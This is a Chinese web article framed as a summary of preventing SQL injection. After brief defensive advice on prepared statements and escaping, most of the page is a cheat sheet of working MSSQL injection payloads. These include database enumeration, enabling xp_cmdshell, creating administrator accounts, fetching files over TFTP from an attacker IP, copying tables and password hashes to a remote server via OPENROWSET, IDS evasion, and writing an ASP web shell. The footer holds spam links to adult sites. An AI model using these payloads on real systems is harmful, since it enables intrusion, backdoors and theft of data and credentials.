<span id="mktg5"></span>

<i id="mktg5"><meter id="mktg5"></meter></i>

        <label id="mktg5"><meter id="mktg5"></meter></label>
        最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
        問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
        當前位置: 首頁 - 科技 - 知識百科 - 正文

        防止SQL語句注入攻擊總結

        來源:懂視網 責編:小采 時間:2020-11-09 09:54:44
        文檔

        防止SQL語句注入攻擊總結

        防止SQL語句注入攻擊總結:這里總結了大量的關于sql語句攻擊與sql注入的命令分析,有需要了解的同學可參考一下。 -----解決方案-------------------------------------------------------- 過濾URL中的一些特殊字符,動態SQL語句使用PrepareStatement.. --
        推薦度:
        導讀防止SQL語句注入攻擊總結:這里總結了大量的關于sql語句攻擊與sql注入的命令分析,有需要了解的同學可參考一下。 -----解決方案-------------------------------------------------------- 過濾URL中的一些特殊字符,動態SQL語句使用PrepareStatement.. --

        這里總結了大量的關于sql語句攻擊與sql注入的命令分析,有需要了解的同學可參考一下。

        -----解決方案--------------------------------------------------------
        過濾URL中的一些特殊字符,動態SQL語句使用PrepareStatement..
        ------解決方案--------------------------------------------------------
        注入的方式就是在查詢條件里加入SQL字符串. 可以檢查一下提交的查詢參數里是否包含SQL,但通常這樣無益.

        最好的辦法是不要用拼接SQL字符串,可以用prepareStatement,參數用set方法進行填裝
        ------解決方案--------------------------------------------------------
        sql注入形式:...where name="+name+",這樣的sql語句很容易sql注入,可以這樣:
        jdbcTemplate.update("delete from userinfo where id=? and userId=?", new Object[]{userInfo.getId(),userInfo.getUserId()});
        我的一些代碼,望有用!
        ------解決方案--------------------------------------------------------
        Sql注入漏洞攻擊:如1'or'1'='1
        使用參數化查詢避免
        cmd.CommandText="select (*) from 表名 where username=@a and pass=@b";
        cmd.parameters.Add(new SqlParameter("a",".."));
        cmd.parameters.Add(new SqlParameter("b",".."));
        ------解決方案--------------------------------------------------------
        恩,用框架,用jpa的pojo。就沒這種事情了

        SSH2架構中 怎么防止SQL注入呢?還有安全問題怎么設計呢?
        目前的安全,只是對用戶密碼加密,前臺驗證。
        如何實現防止注入攻擊還有我的頁面有些隱藏域保存這當前登錄用戶的信息等信息。
        用戶查看頁面源代碼就可以查看到了。
        有沒好的解決方案呢?還有其他哪些要注意的地方呢?
        Struts2 hibernate3 spring 3.0
        sql server 2000 sp4


        ------解決方案--------------------------------------------------------
        1:向 CA 購買證書,使用 HTTPS 進行通信,以保證在網絡傳輸過程中是安全的
        2:避免 XSS 注入(頁面回顯的 input text, input hidden 均過濾 <、>、"、' 等字符等)
        3:使用隨機鍵盤或者安全控件防止鍵盤木馬記錄用戶的輸入
        4:若要在 Cookie 中寫入數據,盡量使用 Cookie 的 HttpOnly 屬性
        5:響應中設置一些諸如 X-Frame-Options、X-XSS-Protection 等高版本瀏覽器支持的 HTTP 頭
        6: 不管客戶端是否做過數據校驗,在服務端必須要有數據校驗(長度、格式、是否必填等等)
        7: SQL 語句采用 PreparedStatement 的填充參數方式,嚴禁使用字符串拼接 SQL 或者 HQL 語句

        再分享一些方法


        1. 強制字符格式(類型)

        在很多時候我們要用到類似xxx.php?id=xxx這樣的URL,一般來說$id都是整型變量,為了防攻擊者把$id篡改成攻擊語句,要盡量強制變量,代碼如下:

        PHP防SQL注入的代碼:

        $id = intval ($_GET['id']);

        當然,還有其它的變量類型,如果有必要的話盡量強制一下格式。

        2. SQL語句中包含變量加引號

        這一點很簡單,但也容易養成相關,先來看看這兩條SQL語句:

        SQL代碼:

        SELECT * FROM article WHERE articleid = ‘$id’

        SELECT * FROM article WHERE articleid = $id

        兩種寫法在各種程序中都很普遍,但安全性是不同的,第一句由于把變量$id放在一對單引號中,這樣使得我們所提交的變量都變成了字符串,即使包含了正確的SQL語句,也不會正常執行,而第二句不同,由于沒有把變量放進單引號中,那我們所提交的一切,只要包含空格,那空格后的變量都會作為SQL語句執行,因此,我們要養成給SQL語句中變量加引號的習慣。

        3. URL偽靜態化

        URL偽靜態化也就是URL重寫技術,像Discuz!一樣,將所有的URL都rewrite成類似xxx-xxx-x.html格式,即有利于SEO,又達到了一定的安全性,也不失為一個好辦法。但是想實現PHP防SQL注入,前提是你得有一定的“正則”基礎。

        4. 用PHP函數過濾與轉義

        PHP的SQL注入比較重要的一點就是GPC的設置問題,因為MYSQL4以下的版本是不支持子語句的,而且當php.ini里的magic_quotes_gpc為On時,提交的變量中所有的 “ ‘ ”(單引號)、“ " ”(雙引號)、“ ”(反斜線)和空字符都會自動轉為含有反斜線的轉義字符,給SQL注入帶來不少的阻礙。

        5. 用PHP的MySQL函數過濾與轉義

        PHP的MySQL操作函數中有addslashes()、mysql_real_escape_string()、mysql_escape_string()等函數,可將特殊字符或可能引起操作出錯的字符轉義。

        那么這三個功能函數之間有什么區別呢?下面我們來詳細講述下:

        ① addslashes的問題在于黑客可以用0xbf27來代替單引號,而addslashes只是將0xbf27修改為0xbf5c27,稱為一個有效的多字節字符,其中0xbf5c仍會被看做是單引號,所以addslashes無法成功攔截。

        當然addslashes也不是毫無用處,它是用于單字節字符串的處理,多字節字符還是用mysql_real_escape_string吧。

        另外對于php手冊中get_magic_quotes_gpc的舉例:

        if(!get_magic_quotes_gpc()){

        $lastname = addslashes($_POST['lastname']);

        }else{

        $lastname = $_POST['lastname'];

        }

        常用的SQl注入語句分析

        最好對magic_quotes_gpc已經打開的情況下,還是對$_POST['lastname']進行檢查一下。

        再說下mysql_real_escape_string和mysql_escape_string這2個函數的區別:

        mysql_real_escape_string必須在(PHP 4 >= 4.3.0, PHP 5)的情況下才能使用。否則只能用mysql_escape_string。

        mysql_real_escape_string考慮到連接的當前字符集,而mysql_escape_string不考慮。

        discuz的防止sql注入就是用addslashes這個函數:

        function daddslashes($string, $force = 0, $strip = FALSE) {

        if(!MAGIC_QUOTES_GPC || $force) {

        if(is_($string)) {

        foreach($string as $key => $val) {

        $string[$key] = daddslashes($val, $force, $strip);

        }

        } else {

        $string = addslashes($strip ? stripslashes($string) : $string);

        }

        }

        return $string;

        }

        常用的sql注入方法


        常用sql注入語句

        1.判斷有無注入點

        ; and 1=1 and 1=2

        2.猜表一般的表的名稱無非是admin adminuser user pass password 等.. 

        and 0<>(select count(*) from *)

        and 0<>(select count(*) from admin) ---判斷是否存在admin這張表

        3.猜帳號數目 如果遇到0< 返回正確頁面 1<;返回錯誤頁面說明帳號數目就是1個

        and 0<(select count(*) from admin)

        and 1<(select count(*) from admin)

        4.猜解字段名稱 在len( ) 括號里面加上我們想到的字段名稱.

        and 1=(select count(*) from admin where len(*)>0)--

        and 1=(select count(*) from admin where len(用戶字段名稱name)>0)

        and 1=(select count(*) from admin where len(密碼字段名稱password)>0)

        5.猜解各個字段的長度 猜解長度就是把>0變換 直到返回正確頁面為止

        and 1=(select count(*) from admin where len(*)>0)

        and 1=(select count(*) from admin where len(name)>6) 錯誤

        and 1=(select count(*) from admin where len(name)>5) 正確 長度是6

        and 1=(select count(*) from admin where len(name)=6) 正確

        and 1=(select count(*) from admin where len(password)>11) 正確

        and 1=(select count(*) from admin where len(password)>12) 錯誤 長度是12

        and 1=(select count(*) from admin where len(password)=12) 正確

        6.猜解字符

        and 1=(select count(*) from admin where left(name,1)=a) ---猜解用戶帳號的第一位

        and 1=(select count(*) from admin where left(name,2)=ab)---猜解用戶帳號的第二位

        就這樣一次加一個字符這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了

        and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

        這個查詢語句可以猜解中文的用戶和密碼.只要把后面的數字換成中文的ASSIC碼就OK.最后把結果再轉換成字符.

        group by users. id having 1=1--

        group by users. id,users.username,users.password,users.privs having 1=1--

        ; insert into users values( 666,attacker,foobar,0xffff )--

        UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-

        UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN

        (login_id)-

        UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN

        (login_id,login_name)-

        UNION SELECT TOP 1 login_name FROM logintable-

        UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--

        看服務器打的補丁=出錯了打了SP4補丁 

        and 1=(select @@VERSION)--

        看數據庫連接賬號的權限,返回正常,證明是服務器角色sysadmin權限。

        and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--

        判斷連接數據庫帳號。(采用SA賬號連接 返回正常=證明了連接賬號是SA)

        and sa=(SELECT System_user)--

        and user_name()=dbo--

        and 0<>(select user_name()--

        看xp_cmdshell是否刪除

        and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--

        xp_cmdshell被刪除,恢復,支持絕對路徑的恢復

        ;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--

        ;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:inetpubwwwrootxplog70.dll--

        反向PING自己實驗

        ;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

        加帳號

        ;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:WINNTsystem32cmd.exe

        /c net user jiaoniang$ 1866574 /add--

        創建一個虛擬目錄E盤:

        ;declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,cscript.exec:inetpubwwwrootmkwebdir.vbs -w "默認Web站點" -v "e","e:"--

        訪問屬性:(配合寫入一個webshell)

        declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse

        爆庫 特殊技巧::%5c= 或者把/和 修改%5提交

        and 0<>(select top 1 paths from newtable)--

        得到庫名(從1到5都是系統的id,6以上才可以判斷)

        and 1=(select name from master.dbo.sysdatabases where dbid=7)--

        and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

        依次提交 dbid = 7,8,9.... 得到更多的數據庫名

        and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一個表 假設為 admin

        and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 來得到其他的表。

        and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin

        and uid>(str(id))) 暴到UID的數值假設為18779569 uid=id

        and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個admin的一個字段,假設為 user_id

        and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in

        (id,...)) 來暴出其他的字段

        and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用戶名

        依次可以得到密碼。假設存在user_id username,password 等字段

        and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

        and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名

        and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))

        and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判斷id值

        and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

        id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

        id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)

        得到WEB路徑

        ;create table [dbo].[swap] ([swappass][char](255));--

        and (select top 1 swappass from swap)=1--

        ;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread

        @rootkey=HKEY_LOCAL_MACHINE,@key=SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots,@value_name=/,

        values=@testOUTPUT insert into paths(path) values(@test)--

        ;use ku1;--

        ;create table cmd (str image);-- 建立image類型的表cmd

        存在xp_cmdshell的測試過程:

        ;exec master..xp_cmdshell dir

        ;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帳號

        ;exec master.dbo.sp_password null,jiaoniang$,1866574;--

        ;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

        ;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes

        /active:yes /add;--

        ;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--

        exec master..xp_servicecontrol start,schedule 啟動服務

        exec master..xp_servicecontrol start,server

        ; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:WINNTsystem32

        cmd.exe /c net user jiaoniang$ 1866574 /add

        ;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:WINNTsystem32cmd.exe

        /c net localgroup administrators jiaoniang$ /add

        ; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上傳文件

        ;declare @a sysname set @a=xp_+cmdshell exec @a dir c:

        ;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:

        ;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat

        如果被限制則可以。

        select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)

        查詢構造:

        SELECT * FROM news WHERE id=... AND topic=... AND .....

        adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>

        select 123;--

        ;use master;--

        :a or name like fff%;-- 顯示有一個叫ffff的用戶哈。

        and 1<>(select count(email) from [user]);--

        ;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--

        ;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--

        ;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--

        ;update [users] set email=(select top 1 count(id) from password) where name=ffff;--

        ;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--

        ;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--

        上面的語句是得到數據庫中的第一個用戶表,并把表名放在ffff用戶的郵箱字段中。

        通過查看ffff的用戶資料可得第一個用表叫ad

        然后根據表名ad得到這個表的ID 得到第二個表的名字

        insert into users values( 666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char

        (0x69)+char(0x73),0xffff)--

        insert into users values( 667,123,123,0xffff)--

        insert into users values ( 123,admin--,password,0xffff)--

        ;and user>0

        ;and (select count(*) from sysobjects)>0

        ;and (select count(*) from mysysobjects)>0 //為access數據庫

        枚舉出數據表名

        ;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--

        這是將第一個表名更新到aaa的字段處。

        讀出第一個表,第二個表可以這樣讀出來(在條件后加上 and name<>;剛才得到的表名)。

        ;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--

        然后id=1552 and exists(select * from aaa where aaa>5)

        讀出第二個表,一個個的讀出,直到沒有為止。

        讀字段是這樣:

        ;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--

        然后id=152 and exists(select * from aaa where aaa>5)出錯,得到字段名

        ;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--

        然后id=152 and exists(select * from aaa where aaa>5)出錯,得到字段名

        [獲得數據表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名]

        update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>;你得到的表名 查出一個加一個])

        [ where 條件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)

        通過SQLSERVER注入漏洞建數據庫管理員帳號和系統管理員帳號[當前帳號必須是SYSADMIN組]

        [獲得數據表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名]

        update 表名 set 字段=(select top 1 col_name(object_id(要查詢的數據表名),字段列如:1) [ where 條件]

        繞過IDS的檢測[使用變量]

        ;declare @a sysname set @a=xp_+cmdshell exec @a dir c:

        ;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:

        開啟遠程數據庫

        基本語法

        select * from OPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select * from table1 )

        參數: (1) OLEDB Provider name

        其中連接字符串參數可以是任何端口用來連接,比如

        select * from OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table

        復制目標主機的整個數據庫insert所有遠程表到本地表。

        基本語法:

        insert into OPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select * from table1) select * from table2

        這行語句將目標主機上table2表中的所有數據復制到遠程數據庫中的table1表中。實際運用中適當修改連接字符串的IP地址和端口,指向需要的地方,比如:

        insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from

        table2

        insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)

        select * from master.dbo.sysdatabases

        insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)

        select * from user_database.dbo.sysobjects

        insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)

        select * from user_database.dbo.syscolumns

        復制數據庫:

        insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * fromdatabase..table2

        復制哈西表(HASH)登錄密碼的hash存儲于sysxlogins中。方法如下:

        insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select

        * from database.dbo.sysxlogins

        得到hash之后,就可以進行暴力破解。

        遍歷目錄的方法:先創建一個臨時表:temp

        ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

        ;insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅動器

        ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 獲得子目錄列表

        ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 獲得所有子目錄的目錄樹結構,并寸入temp表中

        ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看某個文件的內容

        ;insert into temp(id) exec master.dbo.xp_cmdshell dir c:;--

        ;insert into temp(id) exec master.dbo.xp_cmdshell dir c: *.asp /s/a;--

        ;insert into temp(id) exec master.dbo.xp_cmdshell cscript. C:InetpubAdminScriptsadsutil.vbs enum w3svc

        ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- (xp_dirtree適用權限PUBLIC)

        寫入表:

        語句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

        語句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

        語句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

        語句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

        語句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

        語句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

        語句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

        語句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

        語句9:and 1=(SELECT IS_MEMBER(db_owner));--

        把路徑寫到表中去:

        ;create table dirs(paths varchar(100),id int)--

        ;insert dirs exec master.dbo.xp_dirtree c:--

        and 0<>(select top 1 paths from dirs)--

        and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--

        ;create table dirs1(paths varchar(100),id int)--

        ;insert dirs exec master.dbo.xp_dirtree e:web--

        and 0<>(select top 1 paths from dirs1)--

        把數據庫備份到網頁目錄:下載

        ;declare @a sysname; set @a=db_name();backup database @a to disk=e:webdown.bak;--

        and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)

        and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 參看相關表。

        and 1=(select user_id from USER_LOGIN)

        and 0=(select user from USER_LOGIN where user>1)

        -=- wscript.shell example -=-

        declare @o int

        exec sp_oacreate wscript.shell,@o out

        exec sp_oamethod @o,run,NULL,notepad.exe

        ; declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,notepad.exe--

        declare @o int,@f int,@t int,@ret int

        declare @line varchar(8000)

        exec sp_oacreate scripting.filesystemobject,@o out

        exec sp_oamethod @o,opentextfile,@f out,c:boot.ini,1

        exec @ret = sp_oamethod @f,readline,@line out

        while( @ret = 0 )

        begin

        print @line

        exec @ret = sp_oamethod @f,readline,@line out

        end

        declare @o int,@f int,@t int,@ret int

        exec sp_oacreate scripting.filesystemobject,@o out

        exec sp_oamethod @o,createtextfile,@f out,c:inetpubwwwrootfoo.asp,1

        exec @ret = sp_oamethod @f,writeline,NULL,

        <% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>

        declare @o int,@ret int

        exec sp_oacreate speech.voicetext,@o out

        exec sp_oamethod @o,register,NULL,foo,bar

        exec sp_oasetproperty @o,speed,150

        exec sp_oamethod @o,speak,NULL,all your sequel servers are belong to,us,528 waitfor delay 00:00:05

        ; declare @o int,@ret int exec sp_oacreate speech.voicetext,@o out exec sp_oamethod @o,register,NULL,foo,bar exec

        sp_oasetproperty @o,speed,150 exec sp_oamethod @o,speak,NULL,all your sequel servers are belong to us,528 waitfor delay 00:00:05--

        xp_dirtree適用權限PUBLIC

        exec master.dbo.xp_dirtree c:

        返回的信息有兩個字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。

        create table dirs(paths varchar(100),id int)

        建表,這里建的表是和上面xp_dirtree相關連,字段相等、類型相同。

        insert dirs exec master.dbo.xp_dirtree c:

        只要我們建表與存儲進程返回的字段相定義相等就能夠執行!達到寫表的效果.

        聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

        文檔

        防止SQL語句注入攻擊總結

        防止SQL語句注入攻擊總結:這里總結了大量的關于sql語句攻擊與sql注入的命令分析,有需要了解的同學可參考一下。 -----解決方案-------------------------------------------------------- 過濾URL中的一些特殊字符,動態SQL語句使用PrepareStatement.. --
        推薦度:
        標簽: 防止 sql 語句
        • 熱門焦點

        最新推薦

        猜你喜歡

        熱門推薦

        專題
        Top
        主站蜘蛛池模板: 色噜噜亚洲精品中文字幕| 亚洲国产高清精品线久久| 乱人伦中文视频在线观看免费| 亚洲色偷偷综合亚洲AV伊人| 亚洲欧美国产国产综合一区| 亚洲国产美女精品久久久久| 96免费精品视频在线观看| 亚洲人成亚洲精品| 男人免费视频一区二区在线观看| 久久精品人成免费| 亚洲国产美女精品久久久久| 亚洲精品黄色视频在线观看免费资源| 成人一级免费视频| 久久亚洲中文字幕精品一区四 | 成人福利在线观看免费视频| 免费观看国产精品| 国产乱人免费视频| 青青免费在线视频| 国产亚洲精品资源在线26u| 99久热只有精品视频免费观看17| 中国xxxxx高清免费看视频| 亚洲永久中文字幕在线| 久久精品中文字幕免费| 亚洲日韩国产一区二区三区| 国产在线观看免费av站| 亚洲精品美女视频| 精品一卡2卡三卡4卡免费视频| 精品无码免费专区毛片| 亚洲欧美国产国产综合一区| 国产妇乱子伦视频免费| 亚洲成在人天堂在线| 国产卡一卡二卡三免费入口 | 亚洲午夜精品在线| 国产视频精品免费| 免费无码又爽又刺激高潮视频| 亚洲欧洲成人精品香蕉网| 国产精品爱啪在线线免费观看| 久久99亚洲网美利坚合众国| 国产成人精品一区二区三区免费| 亚洲人成77777在线播放网站| 免费观看四虎精品成人|